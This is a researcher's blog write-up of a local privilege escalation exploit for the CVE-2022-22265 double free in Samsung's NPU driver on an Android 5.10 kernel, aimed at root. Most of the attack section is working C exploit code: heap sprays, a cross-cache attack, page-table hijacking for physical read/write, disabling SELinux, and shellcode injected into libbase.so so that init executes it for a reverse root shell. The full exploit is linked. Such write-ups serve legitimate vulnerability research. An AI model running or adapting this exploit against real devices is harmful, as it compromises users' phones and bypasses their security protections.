Introduction

I wanted to exploit a bug on a Samsung Android device, and I chose this CVE from a Google Project Zero report: https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-22265.html. The report is well explained; once you read it, you will notice that the bug is a double free. For exploitation I chose a generic technique that I explain later in this post. The target runs Linux kernel version 5.10.177.

Warning







Checking the SELinux context from the NPU driver we can see:

In this version the NPU driver is restricted to the shell context. If you want to use this exploit, you will need to adapt it to the untrusted_app context.

/sys/fs/selinux/policy



Also, this NPU driver version (Samsung A25) had the bug patched, so I modified the communication with the firmware in npu-interface.c. I did just enough to avoid crashing, because a full analysis was unnecessary: each firmware includes its own extra check code, and I don’t want to do hard work for nothing, thanks. If you want help with reversing the firmware you could look at this and this. You’ll need to adapt it as well.

The bug

The first free comes from the VS4L_VERTEXIOC_S_FORMAT ioctl, which eventually calls vb_queue_s_format(), defined as:

int vb_queue_s_format(struct vb_queue *q, struct vs4l_format_list *flist)

{

int ret = 0;

u32 i;

struct vs4l_format *f;

struct vb_fmt *fmt;

q->format.count = flist->count;

q->format.formats = kcalloc(flist->count, sizeof(struct vb_format), GFP_KERNEL);

...

for (i = 0; i < flist->count; ++i) {

f = &flist->formats[i];

fmt = __vb_find_format(f->format);

if (!fmt) {

vision_err("__vb_find_format is fail\n");

kfree(q->format.formats);

ret = -EINVAL;

goto p_err;

}

...

set_bit(VB_QUEUE_STATE_FORMAT, &q->state);

p_err:

return ret;

If flist contains an invalid format, the function performs the first free and leaves q->format.formats pointing at the freed memory. The second free can be triggered with the VS4L_VERTEXIOC_STREAM_OFF ioctl, which calls vb_queue_stop() to clean up the queue-related data structures. As part of that clean-up, vb_queue_stop() calls kfree(q->format.formats) on the previously freed q->format.formats. To see which conditions must hold to reach the second free, refer to the following code:

static int npu_vertex_streamoff(struct file *file)

{

...

if (!(vctx->state & BIT(NPU_VERTEX_STREAMON))) {

npu_ierr("invalid state(0x%X)\n", vctx, vctx->state);

ret = -EINVAL;

goto p_err;

}

if (!(vctx->state & BIT(NPU_VERTEX_FORMAT))

|| !(vctx->state & BIT(NPU_VERTEX_GRAPH))) {

npu_ierr("invalid state(%X)\n", vctx, vctx->state);

ret = -EINVAL;

goto p_err;

}

...



ret = chk_nw_result_no_error(session);

if (ret == NPU_ERR_NO_ERROR) {

vctx->state |= BIT(NPU_VERTEX_STREAMOFF);

vctx->state &= (~BIT(NPU_VERTEX_STREAMON));

} else {

goto p_err;

}

ret = npu_queue_stop(queue, 0);

if (ret) {

npu_ierr("fail(%d) in npu_queue_stop\n", vctx, ret);

goto p_err;

}

...

int npu_queue_stop(struct npu_queue *queue, int is_forced)

{

int ret = 0;

struct vb_queue *inq, *otq;

inq = &queue->inqueue;

otq = &queue->otqueue;

if (!test_bit(VB_QUEUE_STATE_START, &inq->state) && test_bit(VB_QUEUE_STATE_FORMAT, &inq->state)) {

npu_info("already npu_queue_stop inq done\n");

goto p_err;

}

if (!test_bit(VB_QUEUE_STATE_START, &otq->state) && test_bit(VB_QUEUE_STATE_FORMAT, &otq->state)) {

npu_info("already npu_queue_stop otq done\n");

goto p_err;

}

To reach the second free we need these bits set: NPU_VERTEX_GRAPH, VB_QUEUE_STATE_FORMAT, NPU_VERTEX_FORMAT and NPU_VERTEX_STREAMON. However, when we trigger the first free, the error path of npu_vertex_s_format() clears NPU_VERTEX_GRAPH :(

static int npu_vertex_s_format(struct file *file, struct vs4l_format_list *flist)

{

...

ret = npu_queue_s_format(queue, flist);

if (ret) {

npu_ierr("fail(%d) in npu_queue_s_format\n", vctx, ret);

goto p_err;

}

...

if (flist->direction == VS4L_DIRECTION_OT) {

ret = npu_session_NW_CMD_LOAD(session);

ret = chk_nw_result_no_error(session);

if (ret == NPU_ERR_NO_ERROR) {

vctx->state |= BIT(NPU_VERTEX_FORMAT);

} else {

goto p_err;

}

}

...

p_err:

vctx->state &= (~BIT(NPU_VERTEX_GRAPH));

mutex_unlock(lock);

npu_scheduler_boost_off_timeout(info, NPU_SCHEDULER_BOOST_TIMEOUT);

return ret;

The strategy to leverage both kfree calls relies on the fact that a vb_queue can be used as input or as output:

- ioctl graph

- ioctl format (set VB_QUEUE_STATE_FORMAT as input)

- ioctl graph

- ioctl format (first input kfree)

- ioctl graph (set NPU_VERTEX_GRAPH)

- ioctl format (set NPU_VERTEX_FORMAT as output)

- ioctl streamon (set NPU_VERTEX_STREAMON)

- ioctl streamoff (double input kfree)

Strategy









A signalfd object occupies the freed 128-byte kernel object (on Android the smallest kmalloc cache is 128 bytes). Next, the exploit frees the object again with the VS4L_VERTEXIOC_STREAM_OFF ioctl and reclaims it with a set of pipe_buffer structures using fcntl(fd, F_SETPIPE_SZ, size), similar to the first strategy. This lets me locate the signalfd object and go cross-cache afterwards: I close the pipe that owns the overlapping pipe_buffer (which I locate as well) and empty the slab page that holds the signalfd object. After this, I spray PTEs so that a page table lands under the signalfd UAF and I can manage that page. signalfd has limitations (which I explain later), so I then migrate to a user virtual memory area to manage the page table (full phys r/w). Next, I locate the kernel base to disable SELinux and reach init_task, find current->mm->pgd to perform an MMU walk, and make the libbase.so page writable to inject shellcode over the LogLine method (within the LogMessage object), which will be executed by the init process.

signalfd as a UAF object

I chose the signalfd object, which is allocated from kmalloc-128, to reclaim the first freed object. It is useful for managing a victim page table entry (PTE). However, it has a limitation: every value written through it is ORed with 0x40100. Nevertheless, that is enough to search for a valid page table that belongs to a user virtual memory area and achieve full control of a PTE.

static int do_signalfd4(int ufd, sigset_t *mask, int flags)

{

struct signalfd_ctx *ctx;

/* Check the SFD_* constants for consistency. */

BUILD_BUG_ON(SFD_CLOEXEC != O_CLOEXEC);

BUILD_BUG_ON(SFD_NONBLOCK != O_NONBLOCK);

if (flags & ~(SFD_CLOEXEC | SFD_NONBLOCK))

return -EINVAL;

sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP)); // [1] bits 8 and 18 (SIGKILL, SIGSTOP) are cleared here and end up set to 1 after signotset() -> 0x40100

signotset(mask);

if (ufd == -1) {

ctx = kmalloc(sizeof(*ctx), GFP_KERNEL); // [2] alloc

printk("do_signalfd4 alloc ctx: 0x%016lx\n", ctx);

if (!ctx)

return -ENOMEM;

ctx->sigmask = *mask;

/*

* When we call this, the initialization must be complete, since

* anon_inode_getfd() will install the fd.

*/

ufd = anon_inode_getfd("[signalfd]", &signalfd_fops, ctx,

O_RDWR | (flags & (O_CLOEXEC | O_NONBLOCK)));

if (ufd < 0)

kfree(ctx);

} else {

struct fd f = fdget(ufd);

if (!f.file)

return -EBADF;

ctx = f.file->private_data;

if (f.file->f_op != &signalfd_fops) {

fdput(f);

return -EINVAL;

}

spin_lock_irq(&current->sighand->siglock);

ctx->sigmask = *mask; // [3] write operation

spin_unlock_irq(&current->sighand->siglock);

wake_up(&current->sighand->signalfd_wqh);

fdput(f);

}

return ufd;

}

Spray pipe_buffer to locate signalfd

Page tables are allocated from the buddy allocator, so to get PTEs allocated over the signalfd UAF object we need to go cross-cache. To achieve this, we first spray pipe_buffer objects that land in the 128-byte cache. In the fcntl() call, the third argument is 4096 * n, where n is a power of 2, and it determines the size of the pipe_buffer allocation as 40 * n bytes. With n = 2 that is 80 bytes, which is served from the 128-byte cache.

/* spray pipe_buffer */

char buf[(2 << 12)];

for (int64_t i = 0; i < MAX_PIPES; i++) {

// pin_cpu(i % ncpu);

// The arg has to be pow of 2

if (fcntl(pipefd[i][1], F_SETPIPE_SZ, 4096 * 2) < 0) {

printf("[-] fcntl: %d\n", errno);

exit(0);

}

*(int64_t *) buf = i;

if (write(pipefd[i][1], buf, (1 << 12) + 8) < 0) {

printf("[-] write: %d\n", errno);

exit(0);

}

}

With the spray in place, we can search for the signalfd UAF object by reading the sigmask of each descriptor from /proc/self/fdinfo.

uint64_t leak;

char file[64] = {0};

char buffer[256] = {0};

/* locating vulnerable object (uaf) */

for (uint32_t j = 0; j < MAX_SIGNAL; j++) {

snprintf(file, 26, "/proc/self/fdinfo/%d", fd_cross[offset + j]);

fd_read = open(file, O_RDONLY);

if (fd_read < 0) {

printf("[-] open: %d\n", errno);

exit(0);

}

int n = read(fd_read, buffer, 72);

if (n < 0) {

printf("[-] read: %d\n", errno);

exit(0);

}

if (strncmp(&buffer[47], "fffffffffffbfeff", 16)) {

leak = ~strtoul(&buffer[47], (char **) NULL, 16);

printf("[+] pipe_buffer->page leak: 0x%016lx\n", leak);

fd_idx = offset + j;

break;

}

bzero(file, 26);

bzero(buffer, 72);

}

Cross cache

First, I should mention that I initially open 0x3800 signalfd files to make the cross-cache more reliable. After this, I start the cross-cache process by opening CPU_PARTIAL * OBJS_PER_SLAB signalfd files. Then, after the first kfree, I open more signalfd files to reclaim the freed object and get the UAF object.

/* init signalfd to better cross cache */

for (int i = 0; i < NUM_FILES; i++) {

// pin_cpu(i % ncpu);

mask.sig[0] = ~0; // | 0x40100

fd_init[i] = signalfd(-1, &mask, 0);

if (fd_init[i] < 0) {

printf("[-] signalfd: %d\n", errno);

exit(0);

}

}

uint32_t i = 0, fd_idx = 0, offset = 0;

puts("[+] start signalfd cross cache");

/* start cross cache */

for (i = 0; i < (CPU_PARTIAL * OBJS_PER_SLAB); i++) { // [1] CPU_PARTIAL = 512

// pin_cpu(i % ncpu);

mask.sig[0] = ~0; // | 0x40100

fd_cross[i] = signalfd(-1, &mask, 0);

if (fd_cross[i] < 0) {

printf("[-] signalfd: %d\n", errno);

exit(0);

}

}

offset = i;

/* do format ioctl */

do_format_ioctl(fd, N, VS4L_DIRECTION_IN, 1337);

puts("[+] getting vulnerable object (from signalfd)");

/* getting object vulnerable */

for (i = 0; i < MAX_SIGNAL; i++) {

// pin_cpu(i % ncpu);

mask.sig[0] = ~0; // | 0x40100

fd_cross[offset + i] = signalfd(-1, &mask, 0);

if (fd_cross[offset + i] < 0) {

printf("[-] signalfd: %d\n", errno);

exit(0);

}

}

Now we can search for the pipe whose pipe_buffer overlaps the object, so that we can close it without affecting the signalfd object.

/* locating vulnerable object (cross cache) */

int c;

for (int j = 0; j < MAX_PIPES; j++) {

int n = read(pipefd[j][0], &c, 4);

if (n < 0 || j != c) {

printf("[+] pipe fd found at %dth\n", j);

pos = j;

break;

}

}

if (pos == -1) {

puts("[-] Exploit failed :(");

exit(0);

}

puts("[+] free vulnerable object (from pipe_buffer)");

close(pipefd[pos][0]); // free vulnerable object

close(pipefd[pos][1]);

Then we empty the victim page in beast mode (crude, but it is what works best).

/* emptying the page of the fd vulnerable */

for (i = 0; i < (CPU_PARTIAL * OBJS_PER_SLAB); i++) {

close(fd_cross[i]);

}

/* discard slab */

for (i = 0; i < MAX_SIGNAL; i++) {

if ((offset + i) != fd_idx) {

close(fd_cross[offset + i]);

}

}



Spray PTE (Page Table Entry)

If we read this interesting article, we realize that we need to call mmap first and only later access the pages. We are going to allocate 32 page tables (one page table maps 512 * 4096 = 2MB).

/* mmap spray pte */

uint64_t addr = 0x20000;

for (uint32_t i = 0; i < NUM_TABLE; i++) {

for (uint32_t j = 0; j < NUM_PTE; j++) {

if ((map[i][j] = mmap((void *) addr + (i * 0x200000) + (j * 0x1000), 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED|MAP_FIXED, -1, 0)) == MAP_FAILED) {

perror("[-] mmap()");

exit(0);

}

}

}

Finally, we access each page so that the kernel allocates the page tables (the actual spray).

/* spray PTE */

for (uint32_t i = 0; i < NUM_TABLE; i++) {

for (uint32_t j = 0; j < NUM_PTE; j++) {

*(uint32_t *) map[i][j] = (i * 0x200) + j;

}

}

We now have a signalfd object managing a PTE (phys r/w), with limitations.

Next we search for the virtual page whose PTE we have just changed.

int32_t found = 0;

leak = (leak + 0x1000) | 0x40100;

mask.sig[0] = ~leak; // | 0x40100

signalfd(fd_cross[fd_idx], &mask, 0);

/* replace tlb cache */

replace_tlb();

/* locate buffer */

char *evil = NULL;

for (int i = 0; i < NUM_TABLE; i++) {

for (int j = 0; j < NUM_PTE; j++) {

if (*(uint64_t *) map[i][j] != ((i * 0x200) + j)) {

found = 1;

evil = map[i][j];

printf("[+] found distinct page at virtual 0x%lx\n", (uint64_t) evil);

break;

}

}

if (found) break;

}

Migrate to a vma

We also help ourselves by mapping a new large buffer with its own page tables, which will double as a way to manage the TLB (MAP_POPULATE forces the page faults up front so the PTEs are assigned).

/* buffer to manage tlb */

full_tlb = mmap((void *) NULL, TLB * 0x1000, PROT_READ|PROT_WRITE, MAP_POPULATE|MAP_SHARED|MAP_ANONYMOUS, -1, 0);



To get phys r/w with full control of the PTEs, we can search for a page table that belongs to a user virtual memory area, so we make repeated signalfd calls while looking for it. A user virtual memory area PTE looks like 0x00e80008e8a92f43: it starts with e8 and ends with f43.

The code for searching the page table:

uint64_t *dump = (uint64_t *) evil;

/* locate page table */

found = 0;

uint64_t pte = 0;

while (!found && (((leak | 0x40100) & 0xfffffff43) < end)) {

/* replace tlb cache */

replace_tlb();

if ((dump[0] && ((dump[0] & ((uint64_t) 0xffff << (12 * 4))) == ((uint64_t) 0xe8 << (12 * 4)))

&& ((dump[0] & 0xfff) == 0xf43))

&& (dump[1] && ((dump[1] & ((uint64_t) 0xffff << (12 * 4))) == ((uint64_t) 0xe8 << (12 * 4)))

&& ((dump[1] & 0xfff) == 0xf43))) {

if ((dump[1] - dump[0]) == 0x1000) {

pte = dump[0];

printf("[+] found page table at phys 0x%016lx and phys valid buffer pte 0x%016lx\n", leak, (uint64_t) pte);

found = 1;

break;

}

}

/* replace tlb cache */

replace_tlb();

leak = (leak + 0x1000) | 0x40100;

mask.sig[0] = ~leak; // | 0x40100

signalfd(fd_cross[fd_idx], &mask, 0);

}

Once I found it, I did not want to use signalfd anymore, so I proceeded to migrate to another user virtual memory area. Next, we make the page table point to itself through its first PTE and search for the next PTE, which we use for full phys r/w.

*(uint64_t *) evil = pte + 0x1000;

...

/* locate buffer to migrate and

* manage page table to phys r/w

*/

found = 0;

for (uint32_t i = 0; i < TLB; i++) {

if (full_tlb[i * 512] != i && full_tlb[(i * 512) + 1] != i) {

printf("[+] found victim to migrate at virtual buffer full_tlb 0x%lx\n", (uint64_t) (full_tlb + i * 512));

victim = (char *) (full_tlb + i * 512);

found = 1;

break;

}

}

...

*(uint64_t *) evil = leak; // [1] self-pointer

munmap(evil, 4096);

...

offset_pgt = 8;

*(uint64_t *) (victim + offset_pgt) = pte;

...

/* locate buffer to manage phys r/w */

found = 0;

page = NULL;

for (uint32_t i = 0; i < TLB; i++) {

if ((char *) (full_tlb + i * 512) == victim) continue;

if (full_tlb[i * 512] != i && full_tlb[(i * 512) + 1] != i) {

printf("[+] found victim page at virtual buffer full_tlb 0x%lx\n", (uint64_t) (full_tlb + i * 512));

page = (char *) (full_tlb + i * 512);

found = 1;

break;

}

}

We now have full phys r/w.



Locate kernel

If we look at /proc/iomem as root we can see where we can start to search. In this case at 0x80000000.

80000000-911fffff : System RAM

801b8000-81e17fff : Kernel code

81e18000-81f97fff : reserved

81f98000-82517fff : Kernel data

85100000-86376fff : reserved

87fff000-87ffffff : reserved

8ffff000-90039fff : reserved

Then we search for the magic value in the image header at the kernel base (_text).

#define LINUX_ARM64_IMAGE_MAGIC 0x644d5241

/* search kernel phys base */

found = 0;

uint32_t phys_base;

for (uint64_t j = 0; j < 0x1000; j++) {

/* replace tlb cache */

replace_tlb();

*(uint64_t *) (victim + offset_pgt) = (j * (1 << (3 * 4))) | MEMSTART | 0xe8000000000f43;

/* replace tlb cache */

replace_tlb();

uint32_t magic = *(uint32_t *) (page + 0x38);

if (magic == LINUX_ARM64_IMAGE_MAGIC) {

phys_base = (j * (1 << (3 * 4))) | MEMSTART;

printf("[+] kernel phys base at 0x%x\n", phys_base);

found = 1;

break;

}

}

What can go wrong with the search? If stale TLB entries survive after we rewrite a PTE, we keep accessing the old page and the search does not work. This is how I flush the TLB and replace its entries; we do this before every read and write.

#define TLB 0x28000UL

uint64_t *full_tlb;

/* replace tlb cache */

void replace_tlb(void) {

/* change context */

sync();

/* access pages */

uint32_t junk = 0;

for (uint32_t i = 0; i < TLB; i++) {

uint64_t idx = (uint64_t) (full_tlb + i * 512) & ~0x1fffff;

if (idx == pmd[0] || idx == pmd[1] || idx == pmd[2] || idx == pmd[3]) {

// printf("[*] avoiding pmd 0x%lx\n", idx);

continue;

}

full_tlb[i * 512] = i;

full_tlb[(i * 512) + 1] = i;

if (full_tlb[i * 512] && full_tlb[(i * 512) + 1]) junk++;

}

}

These are the functions to manage phys r/w:

uint64_t read64(uint64_t addr) {

uint32_t off = addr & 0xfff;

/* replace tlb cache */

replace_tlb();

uint64_t pte = ((virt_to_phys(addr) >> 12) << 12) | 0xe8000000000f43;

*(uint64_t *) (victim + offset_pgt) = pte;

/* replace tlb cache */

replace_tlb();

uint64_t data = *(uint64_t *) (page + off);

return data;

}

void write64(uint64_t addr, uint64_t data) {

uint32_t off = addr & 0xfff;

/* replace tlb cache */

replace_tlb();

uint64_t pte = ((virt_to_phys(addr) >> 12) << 12) | 0xe8000000000f43;

*(uint64_t *) (victim + offset_pgt) = pte;

/* replace tlb cache */

replace_tlb();

*(uint64_t *) (page + off) = data;

}

Disable selinux

The struct selinux_state in this case is not protected by the hypervisor. We just have to do:

struct selinux_state {

#ifdef CONFIG_SECURITY_SELINUX_DISABLE

bool disabled;

#endif

#ifdef CONFIG_SECURITY_SELINUX_DEVELOP

bool enforcing;

#endif

bool checkreqprot;

bool initialized;

bool policycap[__POLICYDB_CAPABILITY_MAX];

bool android_netlink_route;

bool android_netlink_getneigh;

struct page *status_page;

struct mutex status_lock;

struct selinux_avc *avc;

struct selinux_policy __rcu *policy;

struct mutex policy_mutex;

} __randomize_layout;

uint32_t phys_data = phys_base + KERNEL_DATA;

uint32_t phys_off = phys_base & 0xffffff;

uint64_t virt_kernel_base = VIRTUAL_KERNEL_START + phys_off;

uint64_t selinux_state = virt_kernel_base + KERNEL_DATA + SELINUX_STATE + OFF_SELINUX_STATE;

/* disable selinux */

write16(selinux_state, 0);

If it were protected, you could look at this talk.

Inject code into libbase.so

Because the kernel is protected by the hypervisor, I had to find somewhere else to inject code, and I thought about init (the root parent process in user space). I ran ldd /init and, starting with the first library in the list, checked what it exported with objdump -T lib.so. When I saw the symbol LogMessage in libbase.so, I went to IDA to check the refs in init, and there were 1840, great. Next, I realized that this was the log we see in dmesg, nice hehe.



First: as you can see in the picture, there are two types of mapping, the vmalloc area and the linear mapping. virt_to_phys and phys_to_virt are easy to compute for the linear mapping; you can look at these functions. The kernel image lives in the vmalloc area but is physically contiguous, just like the linear mapping, so virt_to_phys and phys_to_virt are also possible for it. For everything else in the vmalloc area the translation cannot be calculated. You have a good explanation here (in old kernels the positions of the two mappings were swapped).

And how do we inject code? To inject code into libbase.so we map it with the MAP_SHARED flag and look for the PTE of the page that holds the LogLine method.

/* mmap libbase.so for injecting code */

char *libbase = mmap((void *) NULL, st.st_size, PROT_READ, MAP_SHARED|MAP_POPULATE, fd_libbase, 0);

...

/* search logline function */

char *off = memmem(libbase, st.st_size, logline, 576);



To achieve this we have to find current->mm->pgd and perform an MMU walk. These structures live on the heap, and the heap is in the linear mapping, so we can use virt_to_phys to take advantage of our phys r/w. We find our current process by walking the task list from init_task until we reach it. The next step is to map the page that holds the LogLine method with write permissions and inject the shellcode.

char comm[16];

uint64_t task = 0;

uint64_t ptask = init_task;

/* search current task */

while (task != init_task) {

/* replace tlb cache */

replace_tlb();

task = read64(ptask + OFFSET_TASKS) - OFFSET_TASKS;

*(uint64_t *)(comm) = read64(task + OFFSET_COMM);

*(uint64_t *)(comm + 8) = read64(task + OFFSET_COMM + 8);

printf("%016lx -> %s\n", task, comm);

if (!strncmp(comm, "exp1337", 7)) {

break;

}

ptask = task;

}

...

/* mmu walk */

uint64_t mm = read64(task + OFFSET_MM);

uint64_t pgd = read64(mm + OFFSET_PGD);

...

uint32_t offset_logline = (uint64_t) off & 0xfff;

uint64_t offset_pte = get_directory((uint64_t) off >> (12 + 9 * 0));

uint64_t offset_pmd = get_directory((uint64_t) off >> (12 + 9 * 1));

uint64_t offset_pud = get_directory((uint64_t) off >> (12 + 9 * 2));

...

uint64_t pud = read64(pgd + offset_pud * 8);

uint64_t pmd = read64(phys_to_virt(((pud >> 12) << 12) & 0xffffffffff, true) + offset_pmd * 8);

uint64_t pte_logline = read64(phys_to_virt(((pmd >> 12) << 12) & 0xffffffffff, true) + offset_pte * 8);

/* replace tlb cache */

replace_tlb();

/* set the pte with permissions to inject code */

*(uint64_t *) (victim + offset_pgt) = (((pte_logline >> 12) << 12) & 0xffffffffff) | 0xe8000000000f43;

/* replace tlb cache */

replace_tlb();

/* inject code */

memcpy(page + offset_logline, shellcode, 287);

After achieving LPE we can restore it:

/* restore code */

memcpy(page + offset_logline, logline, 287);

Trigger and getting reverse root shell

We always see segfault messages in dmesg... :) So to trigger the log path we just have to do this:

int pid = fork();

if (!pid) {

sleep(1);

exit(139);

}

kill(pid, SIGSEGV);

sleep(3);

Demo

Full exploit

https://gist.github.com/soez/66eabe37a8dec0937cba8e0cb1ab7ebb

Improvements

- I would like to replace signalfd with another structure that doesn’t have limitations. This way, the exploit would be much faster and more reliable. Yudai Fujiwara has created a plugin named MALTIES that can be used to find them.

- I would like to improve the cross-cache; with a debugger and more time, the exploit would also be more reliable.

- Because the PGD is protected by the hypervisor, you could either play with the PMD level (cool) or use a space-mirroring attack, which consists of just setting read/write permissions and changing the descriptor from table to block so that the MMU walk stops at that level (the PMD would end in 41).

References

https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-22265.html

https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html

https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606

https://pwning.tech/nftables/

https://offlinemark.com/demand-paging/

https://github.com/codingbelief/arm-architecture-reference-manual-for-armv8-a/blob/master/en/chapter_d4/d43_3_memory_attribute_fields_in_the_vmsav8-64_translation_table_formats_descriptors.md

https://blog.impalabs.com/2101_samsung-rkp-compendium.html

https://github.com/yanglingxi1993/slides/blob/main/Asia-24-Wu-Game-of-Cross-Cache.pdf

https://labs.taszk.io/articles/post/bug_collision_in_samsungs_npu_driver/

https://blog.impalabs.com/2103_reversing-samsung-npu.html

https://blog.impalabs.com/2110_exploiting-samsung-npu.html

https://wenboshen.org/posts/2018-09-09-page-table

https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-2-windows

https://conference.hitb.org/hitbsecconf2018ams/materials/D1T2%20-%20Yong%20Wang%20&%20Yang%20Song%20-%20Rooting%20Android%208%20with%20a%20Kernel%20Space%20Mirroring%20Attack.pdf

https://codeblue.jp/2023/result/pdf/cb23-deep-kernel-treasure-hunt-finding-exploitable-structures-in-the-linux-kernel-by-yudai-fujiwara.pdf